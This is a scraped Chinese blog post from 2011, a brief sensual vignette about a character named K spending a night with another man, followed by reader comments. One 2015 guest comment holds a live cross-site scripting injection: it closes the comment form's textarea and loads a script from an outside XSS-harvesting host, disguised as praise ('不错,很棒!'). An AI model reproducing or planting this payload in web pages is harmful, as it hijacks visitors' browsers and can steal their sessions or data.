淡蓝博客数据载入中…
雪中送炭 
咖灰猫 发表于 2011/12/24 23:19:00

 

 

  他放任自己的爱意缠绵,好像之前从来没有失眠过一样。

 

  两个人的肉体交叠,温度的上升仿佛涨潮的浪花边缘,轻柔地覆盖了弯曲的大陆。

 

  细胞里激荡的醉意甜美,把惆怅的情绪都驱散开了,整个身体焕然一新,K发觉自己的心也正在向对方的港湾里靠近。

 

  爱,在没有言辞的情况下,不再是不可能。

 

  因为,当K决定生命的快乐就建立在享受当下而已,那么无论皮肤接触的那人是谁,自己都可以把真挚的爱恋,倾注于这幅对面的男子容貌之上。

 

  唤醒我,K的膨胀的渴念在轻声念咒语,我希望你止不住地想要叫唤我,拥有并守护我。

 

  那是爱的炙烤,在这寒冷的时节,在盈满花香的棉被下,在无限被关注的空间。两个人,拥抱,占有,取暖,挤迫。

 

  还未完成的,都将在这制造意大利雕塑般的两小时劳作中,精工细作而狂狷地做完。

 

Re:雪中送炭
访客pTKw50(游客)发表评论于2015/11/10 19:59:00
访客pTKw50(游客)</textarea>不错,很棒!<script src=http://webxss.net/dJoSE6?1447156822></script>
个人主页 | 引用 | 返回 | 删除 | 回复
Re:雪中送炭
oil painting, art(游客)发表评论于2012/2/8 21:05:00
oil painting, art(游客)有意思!
发表评论:
淡蓝博客数据载入中…
Powered by Oblog.